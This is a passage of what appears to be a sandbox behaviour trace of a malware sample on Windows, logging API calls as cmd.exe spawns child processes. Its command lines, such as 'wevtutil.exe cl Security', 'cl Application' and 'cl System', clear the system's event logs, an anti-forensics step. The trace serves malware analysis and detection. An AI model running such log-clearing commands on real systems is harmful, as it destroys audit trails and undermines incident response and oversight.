(_String1="wevtutil", _String2="MD") returned 10 [0089.920] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0089.920] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0089.920] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0089.920] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0089.920] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0089.920] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0089.920] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0089.920] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0089.920] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0089.920] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0089.920] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0089.920] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0089.920] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0089.920] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0089.920] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0089.920] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0089.920] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0089.920] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0089.921] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0089.921] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0089.921] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0089.921] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0089.921] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0089.921] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0089.921] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0089.921] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0089.921] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0089.921] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0089.921] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0089.921] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0089.921] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0089.921] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0089.921] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0089.921] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0089.921] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0089.921] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0089.921] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0089.921] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0089.921] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0089.921] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0089.921] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0089.921] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0089.921] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0089.921] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0089.921] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0089.921] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0089.921] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0089.921] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0089.921] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0089.921] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0089.921] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0089.921] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0089.921] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0089.921] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0089.921] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0089.921] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0089.921] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0089.922] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0089.922] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0089.922] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0089.922] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0089.922] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0089.922] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0089.922] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0089.922] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0089.922] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0089.922] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0089.922] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0089.922] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0089.922] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0089.922] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0089.922] GetProcessHeap () returned 0x1c0000 [0089.922] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x218) returned 0x1db870 [0089.922] GetProcessHeap () returned 0x1c0000 [0089.922] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x44) returned 0x1e0d90 [0089.922] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0089.923] GetProcessHeap () returned 0x1c0000 [0089.923] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x420) returned 0x1dba90 [0089.923] SetErrorMode (uMode=0x0) returned 0x0 [0089.923] SetErrorMode (uMode=0x1) returned 0x0 [0089.923] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1dbaa0, lpFilePart=0x14f000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f000*="Desktop") returned 0x25 [0089.923] SetErrorMode (uMode=0x0) returned 0x1 [0089.923] GetProcessHeap () returned 0x1c0000 [0089.923] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1dba90, Size=0x76) returned 0x1dba90 [0089.923] GetProcessHeap () returned 0x1c0000 [0089.923] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1dba90) returned 0x76 [0089.923] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0089.923] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0089.923] GetProcessHeap () returned 0x1c0000 [0089.923] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x128) returned 0x1dbb20 [0089.923] GetProcessHeap () returned 0x1c0000 [0089.923] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x240) returned 0x1dbc50 [0089.928] GetProcessHeap () returned 0x1c0000 [0089.928] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1dbc50, Size=0x12a) returned 0x1dbc50 [0089.928] GetProcessHeap () returned 0x1c0000 [0089.928] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1dbc50) returned 0x12a [0089.928] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0089.928] GetProcessHeap () returned 0x1c0000 [0089.929] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xe8) returned 0x1dbd90 [0089.929] GetProcessHeap () returned 0x1c0000 [0089.929] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1dbd90, Size=0x7e) returned 0x1dbd90 [0089.929] GetProcessHeap () returned 0x1c0000 [0089.929] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1dbd90) returned 0x7e [0089.929] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.929] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x14ed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ed70) returned 0xffffffffffffffff [0089.930] GetLastError () returned 0x2 [0089.930] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe.*", fInfoLevelId=0x1, lpFindFileData=0x14ed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ed70) returned 0xffffffffffffffff [0089.930] GetLastError () returned 0x2 [0089.930] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x14ed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ed70) returned 0xffffffffffffffff [0089.930] GetLastError () returned 0x2 [0089.930] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0089.930] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x14ed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ed70) returned 0x1d8950 [0089.930] GetProcessHeap () returned 0x1c0000 [0089.930] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x1d45e0 [0089.930] FindClose (in: hFindFile=0x1d8950 | out: hFindFile=0x1d8950) returned 1 [0089.930] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0089.930] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0089.930] GetConsoleTitleW (in: lpConsoleTitle=0x14f2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0089.942] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f078, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f038 | out: lpAttributeList=0x14f078, lpSize=0x14f038) returned 1 [0089.942] UpdateProcThreadAttribute (in: lpAttributeList=0x14f078, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f028, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f078, lpPreviousValue=0x0) returned 1 [0089.942] GetStartupInfoW (in: lpStartupInfo=0x14f190 | out: lpStartupInfo=0x14f190*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0089.942] GetProcessHeap () returned 0x1c0000 [0089.942] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x20) returned 0x1d4610 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0089.942] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0089.943] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0089.943] GetProcessHeap () returned 0x1c0000 [0089.943] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1d4610 | out: hHeap=0x1c0000) returned 1 [0089.943] GetProcessHeap () returned 0x1c0000 [0089.943] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x12) returned 0x1e1fa0 [0089.943] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0089.944] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil.exe cl Security", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14f0b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil.exe cl Security", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f060 | out: lpCommandLine="wevtutil.exe cl Security", lpProcessInformation=0x14f060*(hProcess=0x54, hThread=0x50, dwProcessId=0xa0c, dwThreadId=0xa10)) returned 1 [0089.947] CloseHandle (hObject=0x50) returned 1 [0089.947] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0089.947] GetProcessHeap () returned 0x1c0000 [0089.947] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dacc0 | out: hHeap=0x1c0000) returned 1 [0089.947] GetEnvironmentStringsW () returned 0x1dacc0* [0089.947] GetProcessHeap () returned 0x1c0000 [0089.947] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xae8) returned 0x1d8af0 [0089.947] FreeEnvironmentStringsW (penv=0x1dacc0) returned 1 [0089.947] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0090.339] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x14efa8 | out: lpExitCode=0x14efa8*=0x0) returned 1 [0090.339] CloseHandle (hObject=0x54) returned 1 [0090.339] _vsnwprintf (in: _Buffer=0x14f218, _BufferCount=0x13, _Format="%08X", _ArgList=0x14efb8 | out: _Buffer="00000000") returned 8 [0090.339] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0090.340] GetProcessHeap () returned 0x1c0000 [0090.340] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1d8af0 | out: hHeap=0x1c0000) returned 1 [0090.340] GetEnvironmentStringsW () returned 0x1d8af0* [0090.340] GetProcessHeap () returned 0x1c0000 [0090.340] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xb0e) returned 0x1dd810 [0090.340] FreeEnvironmentStringsW (penv=0x1d8af0) returned 1 [0090.340] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0090.340] GetProcessHeap () returned 0x1c0000 [0090.340] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dd810 | out: hHeap=0x1c0000) returned 1 [0090.340] GetEnvironmentStringsW () returned 0x1d8af0* [0090.340] GetProcessHeap () returned 0x1c0000 [0090.340] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xb0e) returned 0x1dd810 [0090.340] FreeEnvironmentStringsW (penv=0x1d8af0) returned 1 [0090.340] GetProcessHeap () returned 0x1c0000 [0090.340] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1e1fa0 | out: hHeap=0x1c0000) returned 1 [0090.340] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f078 | out: lpAttributeList=0x14f078) [0090.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.340] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0090.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.340] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a24e194 | out: lpMode=0x4a24e194) returned 1 [0090.340] _get_osfhandle (_FileHandle=0) returned 0x3 [0090.340] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a24e198 | out: lpMode=0x4a24e198) returned 1 [0090.341] SetConsoleInputExeNameW () returned 0x1 [0090.341] GetConsoleOutputCP () returned 0x1b5 [0090.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0090.341] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.341] exit (_Code=0) Process: id = "18" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x27e07000" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x964" cmd_line = "wevtutil.exe cl Application" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 153 os_tid = 0xb60 Thread: id = 155 os_tid = 0xa08 Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7af16000" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl System" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 154 os_tid = 0xa64 [0090.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27ff10 | out: lpSystemTimeAsFileTime=0x27ff10*(dwLowDateTime=0x4846e9e0, dwHighDateTime=0x18d1aee)) [0090.053] GetCurrentProcessId () returned 0xa38 [0090.053] GetCurrentThreadId () returned 0xa64 [0090.053] GetTickCount () returned 0x2581d [0090.053] QueryPerformanceCounter (in: lpPerformanceCount=0x27ff18 | out: lpPerformanceCount=0x27ff18*=21032169479) returned 1 [0090.054] GetModuleHandleW (lpModuleName=0x0) returned 0x4a220000 [0090.054] __set_app_type (_Type=0x1) [0090.054] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a247810) returned 0x0 [0090.055] __getmainargs (in: _Argc=0x4a26a608, _Argv=0x4a26a618, _Env=0x4a26a610, _DoWildCard=0, _StartInfo=0x4a24e0f4 | out: _Argc=0x4a26a608, _Argv=0x4a26a618, _Env=0x4a26a610) returned 0 [0090.055] GetCurrentThreadId () returned 0xa64 [0090.055] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa64) returned 0x3c [0090.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0090.055] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0090.055] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.055] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27fea8 | out: phkResult=0x27fea8*=0x0) returned 0x2 [0090.055] VirtualQuery (in: lpAddress=0x27fe90, lpBuffer=0x27fe10, dwLength=0x30 | out: lpBuffer=0x27fe10*(BaseAddress=0x27f000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.055] VirtualQuery (in: lpAddress=0x180000, lpBuffer=0x27fe10, dwLength=0x30 | out: lpBuffer=0x27fe10*(BaseAddress=0x180000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.056] VirtualQuery (in: lpAddress=0x181000, lpBuffer=0x27fe10, dwLength=0x30 | out: lpBuffer=0x27fe10*(BaseAddress=0x181000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.056] VirtualQuery (in: lpAddress=0x184000, lpBuffer=0x27fe10, dwLength=0x30 | out: lpBuffer=0x27fe10*(BaseAddress=0x184000, AllocationBase=0x180000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.056] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x27fe10, dwLength=0x30 | out: lpBuffer=0x27fe10*(BaseAddress=0x280000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0090.056] GetConsoleOutputCP () returned 0x1b5 [0090.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0090.056] SetConsoleCtrlHandler (HandlerRoutine=0x4a243184, Add=1) returned 1 [0090.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.056] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0090.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.056] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a24e194 | out: lpMode=0x4a24e194) returned 1 [0090.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0090.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0090.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0090.057] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a24e198 | out: lpMode=0x4a24e198) returned 1 [0090.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0090.057] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0090.057] GetEnvironmentStringsW () returned 0x2e8af0* [0090.057] GetProcessHeap () returned 0x2d0000 [0090.057] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2e9580 [0090.057] FreeEnvironmentStringsW (penv=0x2e8af0) returned 1 [0090.057] GetProcessHeap () returned 0x2d0000 [0090.057] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8) returned 0x2e8370 [0090.057] GetEnvironmentStringsW () returned 0x2e8af0* [0090.058] GetProcessHeap () returned 0x2d0000 [0090.058] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2ea010 [0090.058] FreeEnvironmentStringsW (penv=0x2e8af0) returned 1 [0090.058] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27ed68 | out: phkResult=0x27ed68*=0x44) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x0, lpData=0x27ed80*=0x18, lpcbData=0x27ed64*=0x1000) returned 0x2 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x1, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x0, lpData=0x27ed80*=0x1, lpcbData=0x27ed64*=0x1000) returned 0x2 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x0, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x40, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: 